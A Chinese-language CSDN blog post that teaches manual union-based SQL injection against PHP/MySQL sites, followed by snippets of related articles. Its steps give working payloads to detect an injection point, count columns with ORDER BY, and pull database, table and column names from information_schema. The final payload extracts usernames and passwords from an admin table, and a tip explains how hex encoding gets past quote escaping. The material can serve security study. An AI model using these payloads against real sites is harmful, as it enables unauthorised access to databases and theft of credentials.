SQL注入之php+mysql联合查询

最新推荐文章于 2021-04-01 20:32:21 发布
最新推荐文章于 2021-04-01 20:32:21 发布
阅读量443 收藏
点赞数
分类专栏: sql注入 web安全 文章标签: 联合注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kerun1/article/details/103414883
版权

php+mysql联合查询:

判断注入点:单引号,双引号,and 1=1,and 1=2

mysql函数:

database() 查询当前数据库名字
group_concat() 将查询出来的数据值连接起来,返回一个字符串结果

mysql注入知识点:

mysql数据库默认有一张名为:information_schema的数据库,主要查schema表和tables表,schema表是用来存储该用户创建的所有数据库的库名,tables是用来存储用户创建所有数据的库名和表名,字段分别为table_schema和table_name

攻击步骤

1.确定注入点后 order by 1 ,返回正常数字1换2,一次向上加,加到页面报错。
2.如果order by 6错误,order by 5正常,即可确定字段数为5
3.查看回显点 and 1=2 union select 1,2,3,4,5 再出现数字的位置进行查数据,如页面出现数字2
4.查数据库名字:and 1=2 union select 1,database(),3,4,5 出现数字2的位置会出现数据库名字
5.查表 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=‘数据库名称’
6.查列 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=‘表名’
7.查内容 and 1=2 union select 1,group_concat(username,password) from admin

小技巧:以上都返回正常情况,and version() like 5% 正常,9%不正常,即可判断为注入点,注意5%和9%必须要16进制转码。
小技巧:如果网站对单引号进行了转义,可以将数据库名字进行十六进制转码,即可绕过,可正常注入。
夜里的游魂
关注
专栏目录
PHP SQL注入
qpmglj的专栏
04-23 681
什么是SQL注入SQL注入是一种将SQL代码添加到输入参数中,传递给SQL服务器解析并执行的攻击手段。上个简单案例:这是正常mysql数据库查询语句,下面展示SQL注入的案例:select * from dept where deptno = -1 or 1 =1;这就是所谓的将SQL代码添加到输入参数中,传递给SQL服务器解析并执行,这样就可以得知你的数据库信息。攻击者可以通过SQL代码构造,达...
PHP+MysqlSQL注入源码 下载
01-01
这个"PHP+MysqlSQL注入源码 下载"的主题涉及到一个常见的安全问题——SQL注入,以及如何处理和预防这种情况。下面将详细讨论SQL注入PHPMySQL的结合使用,以及如何防范SQL注入。 **SQL注入** SQL注入是一种...
该死的PHP语言中MySQL的两表联合查询
qq_40714105的博客
05-16 2416
需求:有两个表,A表存储临时数据,B表存储永久数据,AB表有相同的id字段,为了区别A的叫gid,B的就叫id。id都是唯一的。需要按照A表id的顺序读取A和B的所有数据。查询语句:$sqlt="select * FROM A LEFT JOIN B ON A.gid=B.id ORDER BY gid DESC ";方法:left join:联合两个表:条件是id相同,顺序按照A表排列...
phpmysql联合查询_MySQL联合查询_MySQL
weixin_42505503的博客
01-19 292
下面具体讲讲简单的JOIN的用法了。首先我们假设有2个表A和B,他们的表结构和字段分别为:表A:IDName1Tim2Jimmy3John4Tom表B:IDHobby1Football2Basketball2Tennis4Soccer1. 内联结:Select A.Name, B.Hobby from A, B where A.id = B.id,这是隐式的内联结,查询的结果是:NameHobby...
mysql关联查询php,MYSQL关联查询(PHP
weixin_28820911的博客
03-10 215
今天在写了一个数据库查询的函数,不过被老大轻喷了。的确之前的查询方式不好,在此整理贴下。有时候我们需要对两张表或多张表进行关联查询。如下图: 方法一:对人员表中的每一项,都去查询部门表。我之前使用的方法...每次都要查询,浪费时间,不推荐。 方法一对应代码(PHP-THINKPHP):$User = D('User');$list = $User->where(true)->selec...
MYSQL关联查询(PHP
weixin_34006965的博客
07-04 263
2019独角兽企业重金招聘Python工程师标准>>> ...
Php+Mysql网页版通用查询系统 v201911
08-23
- 安全性高:通过PHPMySQL的安全特性,可以有效防止SQL注入等安全风险。 - 易于维护:使用标准的技术栈,后期维护和升级相对简单。 综上所述,《PHP+MySQL网页版通用查询系统 v201911》凭借其灵活的架构、强大...
php sql联合查询语句,SQL语句问题,关联查询,一对多
weixin_34324114的博客
03-26 179
比如老师和学生表,一个老师对应多个学生。想查出来老师A和他对应的学生1,2,3,老师B和他对应的4,5,6.回复讨论(解决方案)select * from 学生表 a,教师表 b,教师学生关系表 c where a.studentid = c.studentid and b.teacherid = teacherid and b.teacherid = 你要查的老师id表结构是怎样的?table ...
php mysql联合查询语句,mysql 各种联合查询语句
weixin_39966602的博客
03-24 227
简单的介绍了各种联合查询语句的用法,有inner join ,join left等多表联合查询,有需要的朋友可以参考一下。INNER JOIN(等值连接) 只返回两个表中联结字段相等的行LEFT JOIN(左联接) 返回包括左表中的所有记录和右表中联结字段相等的记录RIGHT JOIN(右联接) 返回包括右表中的所有记录和左表中联结字段相等的记录INNER JOIN 语法:INNER JOIN 连...
php mysql联合查询语句_mysql联合查询语句是什么
weixin_39630466的博客
01-20 63
mysql联合查询语句为【查询语句1 union 查询语句2】,要求多条查询语句的查询的每一列的类型和最好一致,union关键字默认去重,如果使用union all可以包含重复项。本教程操作环境:windows7系统、mysql8.0.22版,DELL G3电脑,该方法适用于所有品牌电脑。相关免费学习推荐:mysql视频教程联合查询UNION 联合 合并:将多条查询语句的结果合并成一个结果...
PHPmysql(手工注入
10-12
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
php sql 表关联查询,sql 多表联合查询
weixin_30220707的博客
03-11 250
关于sql 多表联合查询方法很多,我们今天就来讲一下关于sql多表查询的用法与实例代码,一般会用到select * from (select ) union 来操作。select 类型,sum(合计金额) from(select 商品名称,数量,日期,类型,合计金额 from 出库表where 日期 > '2010-5-5 00:00:00'unionselect 商品名称,数量,日期,类...
PHP mysql 两个数据库的表连接查询
竹林的茅草小屋
11-25 2436
说明: $db_host = 数据库连接名称(localhost:3306) $db_user = 用户名 $db_pwd = 密码 $db_name = 数据库名称 $conn1 = @mysql_connect($host1, $user1, $pwd1); // 这里的‘@’是用来不显示出错的信息 mysql_select_db($name1, $conn1); $conn
php两表联查$sql,sql多表联合查询二个查询实例
weixin_31092081的博客
03-11 320
sql多表联合查询二个查询实例先看常用的查询两表结构不一样m.* , n.* from t1 m, t2 n where m.id = n.idand n.date = (select max(date) from t2 where id = n.id)select m.* , n.* from t1 m, t2 n where m.id = n.idand not exists (select ...
php slect联合查询,sql注入联合查询
weixin_34221384的博客
04-01 97
首先看看基本的数据库表结构:文章表: id(文章id) title(文章内容) content(文章内容)用户表: id(用户id) username(用户名) password(用户密码)然后看看注入:某个文章的链接如下:http://localhost/article.php?id=1,其SQL查询:select title , content from arti...
php mysql 联合查询,mysql联合查询union的用法示例
weixin_33218378的博客
03-10 200
web项目中经常会碰到整站搜索的问题,即客户希望在网站的搜索框中输入一个词语,然后在整个网站中只要包含这个词的页面都要出现在搜索结果中。由于一个web项目不可能用一张表就全部搞定的,所以这里一般都是要用union联合搜索来解决整个问题的。下面列举一下本次使用的union联合搜索的sql语句,方便下次备忘。select * from(SELECT `id`,`subject` FROM `artic...
php处理mysql关联查询的数据_mysql关联查询并得到某条数据的排名。
weixin_29956903的博客
01-28 135
现在有一个订单表,表中有一字段shop_id(店铺id),还有一个shop表(店铺表),现在我想得到某个店铺所有订单总额在所有店铺里面的排名,这个sql语句该怎么写呢?或者说有什么简单的办法去实现呢?ps:店铺表中没有销售总额字段,我现在是先将所有店铺的销售额进行排序,但是如果去遍历数组比较某个店铺的销售额的排名实在是太麻烦了回复内容:现在有一个订单表,表中有一字段shop_id(店铺id),还有...
php连接并查询数据库
qq_40390383的博客
04-11 1007
<html> <head> <meta charset="utf-8"> <title>sql注入靶机</title> </head> <body> <form action="sql.php" method="GET"> username:<input type="text" name="u...
PHP查询登录中的sql注入
dilunzhuang0924的博客
06-28 98
---------------------------------------------------------------------------------------------------- 比如以下一段登录的代码: if($l = @mysql_connect('localhost', 'root', '123')) or die('数据库连接失败'); mysql_s...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值